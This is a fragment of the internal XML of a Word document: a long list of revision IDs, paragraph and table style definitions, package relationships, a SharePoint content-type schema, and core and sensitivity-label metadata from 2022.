    <w:rsid w:val="00DD73C5"/>
    <w:rsid w:val="00DE0622"/>
    <w:rsid w:val="00DE16A1"/>
    <w:rsid w:val="00DE18D9"/>
    <w:rsid w:val="00DE1A86"/>
    <w:rsid w:val="00DE28EA"/>
    <w:rsid w:val="00DE2EF7"/>
    <w:rsid w:val="00DE30FB"/>
    <w:rsid w:val="00DE3374"/>
    <w:rsid w:val="00DE3586"/>
    <w:rsid w:val="00DE3839"/>
    <w:rsid w:val="00DE3984"/>
    <w:rsid w:val="00DE3B87"/>
    <w:rsid w:val="00DE3CF1"/>
    <w:rsid w:val="00DE4008"/>
    <w:rsid w:val="00DE4837"/>
    <w:rsid w:val="00DE4EFD"/>
    <w:rsid w:val="00DE51C5"/>
    <w:rsid w:val="00DF1637"/>
    <w:rsid w:val="00DF1AB9"/>
    <w:rsid w:val="00DF1D60"/>
    <w:rsid w:val="00DF1FD3"/>
    <w:rsid w:val="00DF2B1C"/>
    <w:rsid w:val="00DF3FA2"/>
    <w:rsid w:val="00DF4576"/>
    <w:rsid w:val="00DF54F0"/>
    <w:rsid w:val="00DF5DFC"/>
    <w:rsid w:val="00DF60A7"/>
    <w:rsid w:val="00DF6C42"/>
    <w:rsid w:val="00DF7626"/>
    <w:rsid w:val="00E0001D"/>
    <w:rsid w:val="00E00188"/>
    <w:rsid w:val="00E004E2"/>
    <w:rsid w:val="00E00652"/>
    <w:rsid w:val="00E00D8A"/>
    <w:rsid w:val="00E019B5"/>
    <w:rsid w:val="00E01C86"/>
    <w:rsid w:val="00E0213F"/>
    <w:rsid w:val="00E02295"/>
    <w:rsid w:val="00E03521"/>
    <w:rsid w:val="00E03A2C"/>
    <w:rsid w:val="00E03C6C"/>
    <w:rsid w:val="00E03E46"/>
    <w:rsid w:val="00E04164"/>
    <w:rsid w:val="00E051D9"/>
    <w:rsid w:val="00E05459"/>
    <w:rsid w:val="00E05567"/>
    <w:rsid w:val="00E06201"/>
    <w:rsid w:val="00E07271"/>
    <w:rsid w:val="00E075D6"/>
    <w:rsid w:val="00E07D95"/>
    <w:rsid w:val="00E07E9C"/>
    <w:rsid w:val="00E108A1"/>
    <w:rsid w:val="00E10C25"/>
    <w:rsid w:val="00E110D7"/>
    <w:rsid w:val="00E114CD"/>
    <w:rsid w:val="00E12086"/>
    <w:rsid w:val="00E12D80"/>
    <w:rsid w:val="00E13014"/>
    <w:rsid w:val="00E130DD"/>
    <w:rsid w:val="00E13AB3"/>
    <w:rsid w:val="00E158BF"/>
    <w:rsid w:val="00E159A5"/>
    <w:rsid w:val="00E166E5"/>
    <w:rsid w:val="00E16C4E"/>
    <w:rsid w:val="00E221E1"/>
    <w:rsid w:val="00E222A7"/>
    <w:rsid w:val="00E22387"/>
    <w:rsid w:val="00E22791"/>
    <w:rsid w:val="00E2298C"/>
    <w:rsid w:val="00E22B01"/>
    <w:rsid w:val="00E24233"/>
    <w:rsid w:val="00E24953"/>
    <w:rsid w:val="00E25106"/>
    <w:rsid w:val="00E2541A"/>
    <w:rsid w:val="00E25CD8"/>
    <w:rsid w:val="00E266F0"/>
    <w:rsid w:val="00E26F77"/>
    <w:rsid w:val="00E27BC1"/>
    <w:rsid w:val="00E27CCA"/>
    <w:rsid w:val="00E30517"/>
    <w:rsid w:val="00E31910"/>
    <w:rsid w:val="00E31E04"/>
    <w:rsid w:val="00E32B9C"/>
    <w:rsid w:val="00E33010"/>
    <w:rsid w:val="00E33807"/>
    <w:rsid w:val="00E34232"/>
    <w:rsid w:val="00E3454B"/>
    <w:rsid w:val="00E346EC"/>
    <w:rsid w:val="00E356AC"/>
    <w:rsid w:val="00E36B37"/>
    <w:rsid w:val="00E3701F"/>
    <w:rsid w:val="00E41FF6"/>
    <w:rsid w:val="00E42F0F"/>
    <w:rsid w:val="00E430EA"/>
    <w:rsid w:val="00E43917"/>
    <w:rsid w:val="00E43D0C"/>
    <w:rsid w:val="00E45B08"/>
    <w:rsid w:val="00E45B8E"/>
    <w:rsid w:val="00E45E3D"/>
    <w:rsid w:val="00E465F6"/>
    <w:rsid w:val="00E475C6"/>
    <w:rsid w:val="00E47A5F"/>
    <w:rsid w:val="00E47FA5"/>
    <w:rsid w:val="00E50CD0"/>
    <w:rsid w:val="00E51EFF"/>
    <w:rsid w:val="00E524EB"/>
    <w:rsid w:val="00E52CAE"/>
    <w:rsid w:val="00E53263"/>
    <w:rsid w:val="00E53720"/>
    <w:rsid w:val="00E53EE2"/>
    <w:rsid w:val="00E546C2"/>
    <w:rsid w:val="00E54B3B"/>
    <w:rsid w:val="00E550AA"/>
    <w:rsid w:val="00E5550F"/>
    <w:rsid w:val="00E55570"/>
    <w:rsid w:val="00E556DE"/>
    <w:rsid w:val="00E55897"/>
    <w:rsid w:val="00E55958"/>
    <w:rsid w:val="00E567FA"/>
    <w:rsid w:val="00E5736A"/>
    <w:rsid w:val="00E57C09"/>
    <w:rsid w:val="00E57DDE"/>
    <w:rsid w:val="00E57FF6"/>
    <w:rsid w:val="00E60702"/>
    <w:rsid w:val="00E62A62"/>
    <w:rsid w:val="00E62BCA"/>
    <w:rsid w:val="00E6351E"/>
    <w:rsid w:val="00E63EF4"/>
    <w:rsid w:val="00E63F0D"/>
    <w:rsid w:val="00E649BF"/>
    <w:rsid w:val="00E65340"/>
    <w:rsid w:val="00E66563"/>
    <w:rsid w:val="00E66B20"/>
    <w:rsid w:val="00E670DF"/>
    <w:rsid w:val="00E671CD"/>
    <w:rsid w:val="00E6782A"/>
    <w:rsid w:val="00E706DB"/>
    <w:rsid w:val="00E7104A"/>
    <w:rsid w:val="00E7123D"/>
    <w:rsid w:val="00E712D8"/>
    <w:rsid w:val="00E71463"/>
    <w:rsid w:val="00E71BC1"/>
    <w:rsid w:val="00E72153"/>
    <w:rsid w:val="00E72C50"/>
    <w:rsid w:val="00E72D07"/>
    <w:rsid w:val="00E7391B"/>
    <w:rsid w:val="00E73C66"/>
    <w:rsid w:val="00E75484"/>
    <w:rsid w:val="00E756C8"/>
    <w:rsid w:val="00E75D6D"/>
    <w:rsid w:val="00E75FA3"/>
    <w:rsid w:val="00E7649C"/>
    <w:rsid w:val="00E771B3"/>
    <w:rsid w:val="00E804F1"/>
    <w:rsid w:val="00E809C0"/>
    <w:rsid w:val="00E80C35"/>
    <w:rsid w:val="00E80F38"/>
    <w:rsid w:val="00E819F1"/>
    <w:rsid w:val="00E81F00"/>
    <w:rsid w:val="00E8264B"/>
    <w:rsid w:val="00E83690"/>
    <w:rsid w:val="00E83F35"/>
    <w:rsid w:val="00E851E6"/>
    <w:rsid w:val="00E8653B"/>
    <w:rsid w:val="00E86E07"/>
    <w:rsid w:val="00E9019D"/>
    <w:rsid w:val="00E90463"/>
    <w:rsid w:val="00E90D5F"/>
    <w:rsid w:val="00E90F95"/>
    <w:rsid w:val="00E91337"/>
    <w:rsid w:val="00E92563"/>
    <w:rsid w:val="00E92E68"/>
    <w:rsid w:val="00E93F5B"/>
    <w:rsid w:val="00E945F4"/>
    <w:rsid w:val="00E9592A"/>
    <w:rsid w:val="00E95C5E"/>
    <w:rsid w:val="00E96ADC"/>
    <w:rsid w:val="00E96E9C"/>
    <w:rsid w:val="00E97DFF"/>
    <w:rsid w:val="00EA02FF"/>
    <w:rsid w:val="00EA0514"/>
    <w:rsid w:val="00EA0945"/>
    <w:rsid w:val="00EA0A87"/>
    <w:rsid w:val="00EA22C0"/>
    <w:rsid w:val="00EA25C8"/>
    <w:rsid w:val="00EA2D02"/>
    <w:rsid w:val="00EA33B4"/>
    <w:rsid w:val="00EA3621"/>
    <w:rsid w:val="00EA3A23"/>
    <w:rsid w:val="00EA485A"/>
    <w:rsid w:val="00EA6C1D"/>
    <w:rsid w:val="00EA7019"/>
    <w:rsid w:val="00EA790D"/>
    <w:rsid w:val="00EA7DB0"/>
    <w:rsid w:val="00EB024C"/>
    <w:rsid w:val="00EB07D0"/>
    <w:rsid w:val="00EB0AA8"/>
    <w:rsid w:val="00EB10D4"/>
    <w:rsid w:val="00EB1999"/>
    <w:rsid w:val="00EB3B43"/>
    <w:rsid w:val="00EB4360"/>
    <w:rsid w:val="00EB4705"/>
    <w:rsid w:val="00EB58F2"/>
    <w:rsid w:val="00EB62BE"/>
    <w:rsid w:val="00EB69D2"/>
    <w:rsid w:val="00EC05B8"/>
    <w:rsid w:val="00EC0791"/>
    <w:rsid w:val="00EC0A5A"/>
    <w:rsid w:val="00EC0F47"/>
    <w:rsid w:val="00EC15D7"/>
    <w:rsid w:val="00EC2924"/>
    <w:rsid w:val="00EC2CF8"/>
    <w:rsid w:val="00EC303D"/>
    <w:rsid w:val="00EC3167"/>
    <w:rsid w:val="00EC36D7"/>
    <w:rsid w:val="00EC51E4"/>
    <w:rsid w:val="00EC546E"/>
    <w:rsid w:val="00EC5B88"/>
    <w:rsid w:val="00EC5D9D"/>
    <w:rsid w:val="00EC6CEF"/>
    <w:rsid w:val="00EC6EE8"/>
    <w:rsid w:val="00ED017C"/>
    <w:rsid w:val="00ED06B8"/>
    <w:rsid w:val="00ED116F"/>
    <w:rsid w:val="00ED12B2"/>
    <w:rsid w:val="00ED1777"/>
    <w:rsid w:val="00ED1A88"/>
    <w:rsid w:val="00ED20BD"/>
    <w:rsid w:val="00ED22C7"/>
    <w:rsid w:val="00ED2A90"/>
    <w:rsid w:val="00ED370C"/>
    <w:rsid w:val="00ED40B8"/>
    <w:rsid w:val="00ED4471"/>
    <w:rsid w:val="00ED4EA3"/>
    <w:rsid w:val="00ED505D"/>
    <w:rsid w:val="00ED5800"/>
    <w:rsid w:val="00ED5BF2"/>
    <w:rsid w:val="00ED6152"/>
    <w:rsid w:val="00ED780F"/>
    <w:rsid w:val="00ED7C8E"/>
    <w:rsid w:val="00EE1703"/>
    <w:rsid w:val="00EE31CB"/>
    <w:rsid w:val="00EE33DD"/>
    <w:rsid w:val="00EE34FC"/>
    <w:rsid w:val="00EE3554"/>
    <w:rsid w:val="00EE3D5F"/>
    <w:rsid w:val="00EE4188"/>
    <w:rsid w:val="00EE4CDB"/>
    <w:rsid w:val="00EE4DB6"/>
    <w:rsid w:val="00EE5A56"/>
    <w:rsid w:val="00EE603D"/>
    <w:rsid w:val="00EE6606"/>
    <w:rsid w:val="00EE668E"/>
    <w:rsid w:val="00EE78F0"/>
    <w:rsid w:val="00EE7F8A"/>
    <w:rsid w:val="00EF005A"/>
    <w:rsid w:val="00EF1831"/>
    <w:rsid w:val="00EF1EF9"/>
    <w:rsid w:val="00EF2944"/>
    <w:rsid w:val="00EF31C4"/>
    <w:rsid w:val="00EF3399"/>
    <w:rsid w:val="00EF5B28"/>
    <w:rsid w:val="00EF614F"/>
    <w:rsid w:val="00EF6CA3"/>
    <w:rsid w:val="00EF7CA6"/>
    <w:rsid w:val="00F00222"/>
    <w:rsid w:val="00F00809"/>
    <w:rsid w:val="00F00999"/>
    <w:rsid w:val="00F00A49"/>
    <w:rsid w:val="00F01BF9"/>
    <w:rsid w:val="00F01CFB"/>
    <w:rsid w:val="00F01DEA"/>
    <w:rsid w:val="00F02292"/>
    <w:rsid w:val="00F0250F"/>
    <w:rsid w:val="00F02681"/>
    <w:rsid w:val="00F03554"/>
    <w:rsid w:val="00F04842"/>
    <w:rsid w:val="00F04B56"/>
    <w:rsid w:val="00F05E5C"/>
    <w:rsid w:val="00F07392"/>
    <w:rsid w:val="00F105F8"/>
    <w:rsid w:val="00F11A55"/>
    <w:rsid w:val="00F13824"/>
    <w:rsid w:val="00F14011"/>
    <w:rsid w:val="00F14028"/>
    <w:rsid w:val="00F15658"/>
    <w:rsid w:val="00F159D7"/>
    <w:rsid w:val="00F15C76"/>
    <w:rsid w:val="00F15E0E"/>
    <w:rsid w:val="00F16051"/>
    <w:rsid w:val="00F16E6C"/>
    <w:rsid w:val="00F17A58"/>
    <w:rsid w:val="00F17BC7"/>
    <w:rsid w:val="00F17C93"/>
    <w:rsid w:val="00F201E5"/>
    <w:rsid w:val="00F205F6"/>
    <w:rsid w:val="00F20A67"/>
    <w:rsid w:val="00F21C87"/>
    <w:rsid w:val="00F228C2"/>
    <w:rsid w:val="00F24437"/>
    <w:rsid w:val="00F24790"/>
    <w:rsid w:val="00F248DC"/>
    <w:rsid w:val="00F25569"/>
    <w:rsid w:val="00F258FF"/>
    <w:rsid w:val="00F25ACC"/>
    <w:rsid w:val="00F26E0F"/>
    <w:rsid w:val="00F34535"/>
    <w:rsid w:val="00F3455C"/>
    <w:rsid w:val="00F35D57"/>
    <w:rsid w:val="00F360D8"/>
    <w:rsid w:val="00F36683"/>
    <w:rsid w:val="00F36A2D"/>
    <w:rsid w:val="00F3741C"/>
    <w:rsid w:val="00F3770D"/>
    <w:rsid w:val="00F37811"/>
    <w:rsid w:val="00F379C8"/>
    <w:rsid w:val="00F40969"/>
    <w:rsid w:val="00F41301"/>
    <w:rsid w:val="00F41316"/>
    <w:rsid w:val="00F42C38"/>
    <w:rsid w:val="00F442D4"/>
    <w:rsid w:val="00F4497D"/>
    <w:rsid w:val="00F45DAF"/>
    <w:rsid w:val="00F45FB1"/>
    <w:rsid w:val="00F461A2"/>
    <w:rsid w:val="00F46E90"/>
    <w:rsid w:val="00F47662"/>
    <w:rsid w:val="00F47F81"/>
    <w:rsid w:val="00F5037F"/>
    <w:rsid w:val="00F51380"/>
    <w:rsid w:val="00F51A7C"/>
    <w:rsid w:val="00F51B98"/>
    <w:rsid w:val="00F5275D"/>
    <w:rsid w:val="00F529E3"/>
    <w:rsid w:val="00F52F26"/>
    <w:rsid w:val="00F53183"/>
    <w:rsid w:val="00F53214"/>
    <w:rsid w:val="00F5644E"/>
    <w:rsid w:val="00F56E03"/>
    <w:rsid w:val="00F5733A"/>
    <w:rsid w:val="00F573FA"/>
    <w:rsid w:val="00F57654"/>
    <w:rsid w:val="00F604D4"/>
    <w:rsid w:val="00F60CC3"/>
    <w:rsid w:val="00F611A9"/>
    <w:rsid w:val="00F611C2"/>
    <w:rsid w:val="00F61E7C"/>
    <w:rsid w:val="00F6207A"/>
    <w:rsid w:val="00F6251A"/>
    <w:rsid w:val="00F62897"/>
    <w:rsid w:val="00F63015"/>
    <w:rsid w:val="00F639DA"/>
    <w:rsid w:val="00F63A6F"/>
    <w:rsid w:val="00F63E59"/>
    <w:rsid w:val="00F643B3"/>
    <w:rsid w:val="00F64597"/>
    <w:rsid w:val="00F656E1"/>
    <w:rsid w:val="00F67069"/>
    <w:rsid w:val="00F672C7"/>
    <w:rsid w:val="00F717EA"/>
    <w:rsid w:val="00F71ED6"/>
    <w:rsid w:val="00F7284A"/>
    <w:rsid w:val="00F73C9E"/>
    <w:rsid w:val="00F74A58"/>
    <w:rsid w:val="00F74DB6"/>
    <w:rsid w:val="00F74DDA"/>
    <w:rsid w:val="00F74E73"/>
    <w:rsid w:val="00F7576F"/>
    <w:rsid w:val="00F75C75"/>
    <w:rsid w:val="00F760DB"/>
    <w:rsid w:val="00F76103"/>
    <w:rsid w:val="00F762A8"/>
    <w:rsid w:val="00F7634E"/>
    <w:rsid w:val="00F763FF"/>
    <w:rsid w:val="00F7717F"/>
    <w:rsid w:val="00F77808"/>
    <w:rsid w:val="00F800BE"/>
    <w:rsid w:val="00F806E1"/>
    <w:rsid w:val="00F8077B"/>
    <w:rsid w:val="00F80D89"/>
    <w:rsid w:val="00F81E3F"/>
    <w:rsid w:val="00F820AB"/>
    <w:rsid w:val="00F821C1"/>
    <w:rsid w:val="00F833EA"/>
    <w:rsid w:val="00F84E08"/>
    <w:rsid w:val="00F8542F"/>
    <w:rsid w:val="00F854AE"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00F86822"/>
    <w:rsid w:val="00F92C6D"/>
    <w:rsid w:val="00F92F91"/>
    <w:rsid w:val="00F930EE"/>
    <w:rsid w:val="00F93468"/>
    <w:rsid w:val="00F9362B"/>
    <w:rsid w:val="00F94265"/>
    <w:rsid w:val="00F94C5C"/>
    <w:rsid w:val="00F95BFA"/>
    <w:rsid w:val="00F9613A"/>
    <w:rsid w:val="00F9621C"/>
    <w:rsid w:val="00F969FC"/>
    <w:rsid w:val="00F97844"/>
    <w:rsid w:val="00F978CE"/>
    <w:rsid w:val="00FA014D"/>
    <w:rsid w:val="00FA0595"/>
    <w:rsid w:val="00FA193D"/>
    <w:rsid w:val="00FA2B7E"/>
    <w:rsid w:val="00FA360F"/>
    <w:rsid w:val="00FA37C7"/>
    <w:rsid w:val="00FA3948"/>
    <w:rsid w:val="00FA4680"/>
    <w:rsid w:val="00FA47A0"/>
    <w:rsid w:val="00FA5C28"/>
    <w:rsid w:val="00FA5E76"/>
    <w:rsid w:val="00FA6500"/>
    <w:rsid w:val="00FA666A"/>
    <w:rsid w:val="00FA7163"/>
    <w:rsid w:val="00FA7E91"/>
    <w:rsid w:val="00FB0368"/>
    <w:rsid w:val="00FB0797"/>
    <w:rsid w:val="00FB0B39"/>
    <w:rsid w:val="00FB16EE"/>
    <w:rsid w:val="00FB1B96"/>
    <w:rsid w:val="00FB2458"/>
    <w:rsid w:val="00FB2A00"/>
    <w:rsid w:val="00FB2D1C"/>
    <w:rsid w:val="00FB3BAA"/>
    <w:rsid w:val="00FB3D1C"/>
    <w:rsid w:val="00FB4284"/>
    <w:rsid w:val="00FB4C2D"/>
    <w:rsid w:val="00FB53D9"/>
    <w:rsid w:val="00FB5418"/>
    <w:rsid w:val="00FB5DB2"/>
    <w:rsid w:val="00FB606B"/>
    <w:rsid w:val="00FB611E"/>
    <w:rsid w:val="00FB6CF1"/>
    <w:rsid w:val="00FB7957"/>
    <w:rsid w:val="00FB7D8C"/>
    <w:rsid w:val="00FB7F3D"/>
    <w:rsid w:val="00FC04E9"/>
    <w:rsid w:val="00FC1545"/>
    <w:rsid w:val="00FC1CAA"/>
    <w:rsid w:val="00FC1E7F"/>
    <w:rsid w:val="00FC20C7"/>
    <w:rsid w:val="00FC29F1"/>
    <w:rsid w:val="00FC3899"/>
    <w:rsid w:val="00FC46E0"/>
    <w:rsid w:val="00FC4D9B"/>
    <w:rsid w:val="00FC703D"/>
    <w:rsid w:val="00FC71EB"/>
    <w:rsid w:val="00FC73F9"/>
    <w:rsid w:val="00FC77B0"/>
    <w:rsid w:val="00FD03F0"/>
    <w:rsid w:val="00FD0BDC"/>
    <w:rsid w:val="00FD17AB"/>
    <w:rsid w:val="00FD1DE8"/>
    <w:rsid w:val="00FD1E25"/>
    <w:rsid w:val="00FD2BC5"/>
    <w:rsid w:val="00FD3E51"/>
    <w:rsid w:val="00FD3F29"/>
    <w:rsid w:val="00FD438A"/>
    <w:rsid w:val="00FD4F18"/>
    <w:rsid w:val="00FD5666"/>
    <w:rsid w:val="00FD607A"/>
    <w:rsid w:val="00FD6C53"/>
    <w:rsid w:val="00FD70CD"/>
    <w:rsid w:val="00FD79F0"/>
    <w:rsid w:val="00FE0081"/>
    <w:rsid w:val="00FE0505"/>
    <w:rsid w:val="00FE0A36"/>
    <w:rsid w:val="00FE0A6C"/>
    <w:rsid w:val="00FE187A"/>
    <w:rsid w:val="00FE1CD7"/>
    <w:rsid w:val="00FE2420"/>
    <w:rsid w:val="00FE2FEE"/>
    <w:rsid w:val="00FE49F2"/>
    <w:rsid w:val="00FE4FF8"/>
    <w:rsid w:val="00FE5632"/>
    <w:rsid w:val="00FE5A2D"/>
    <w:rsid w:val="00FE6E6D"/>
    <w:rsid w:val="00FE728A"/>
    <w:rsid w:val="00FF0026"/>
    <w:rsid w:val="00FF055B"/>
    <w:rsid w:val="00FF09DB"/>
    <w:rsid w:val="00FF10A6"/>
    <w:rsid w:val="00FF1248"/>
    <w:rsid w:val="00FF2149"/>
    <w:rsid w:val="00FF46A4"/>
    <w:rsid w:val="00FF4890"/>
    <w:rsid w:val="00FF4E70"/>
    <w:rsid w:val="00FF50DD"/>
    <w:rsid w:val="00FF5234"/>
    <w:rsid w:val="00FF5244"/>
    <w:rsid w:val="00FF5290"/>
    <w:rsid w:val="00FF5BD1"/>
    <w:rsid w:val="00FF5D65"/>
    <w:rsid w:val="00FF654F"/>
    <w:rsid w:val="00FF7474"/>
    <w:rsid w:val="00FF78A4"/>
    <w:rsid w:val="1832111C"/>
    <w:rsid w:val="1EA57D90"/>
    <w:rsid w:val="21AC7083"/>
    <w:rsid w:val="2E086E65"/>
    <w:rsid w:val="42F71AAC"/>
    <w:rsid w:val="499CCED3"/>
    <w:rsid w:val="4C1E5A7A"/>
    <w:rsid w:val="78BFC8EB"/>
    <w:rsid w:val="7A3C8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8778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7E4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00091F75"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs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75"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0009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75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:rsid w:val="00091F75"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs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C2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9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2BF7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia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0D1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D11AF"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240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0D11AF"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-GB"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A660EA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252F4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8B57B1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CD3142"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00125C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customStyle="1" w:styleId="TableGrid7">
    <w:name w:val="Table Grid7"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00E3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2C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C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7C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D7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2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23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4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34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9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9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2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9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999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49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0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782">
          <w:marLeft w:val="1166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4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2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7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7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38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2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49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3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3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42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40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3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7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emf"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4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2B3367BB472418112694AC156A310" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="452473e6de3c29b1aa5a12f059996122">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="882e2ba7-d599-4115-a387-3a64f42c0532" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="8fb8ec700b400de1e175a346409e3989" ns2:_="">
    <xsd:import namespace="882e2ba7-d599-4115-a387-3a64f42c0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2ba7-d599-4115-a387-3a64f42c0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E8D58A-0E13-41E1-9A17-91F6D84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20B00C-9731-485A-B3CA-114AEB9F9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51F66-C999-4149-96B1-D37BB3063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2ba7-d599-4115-a387-3a64f42c0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D3AC1-482F-4058-B599-27DF1E5DD8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21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dala Divyan Munirathnam</dc:creator>
  <cp:lastModifiedBy>Lee Yu Yee Dominic /CSF</cp:lastModifiedBy>
  <cp:revision>67</cp:revision>
  <cp:lastPrinted>2021-12-16T06:47:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-15T16:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11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2B3367BB472418112694AC156A310</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_SetDate">
    <vt:lpwstr>2022-11-14T06:45:37Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_Name">
    <vt:lpwstr>dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_SiteId">
    <vt:lpwstr>cba9e115-3016-4462-a1ab-a565cba0cdf1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_ActionId">
    <vt:lpwstr>3a72217e-4668-4648-a804-46abb9814399</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_ContentBits">
    <vt:lpwstr>1</vt:lpwstr>
  </property>
</Properties>
</file>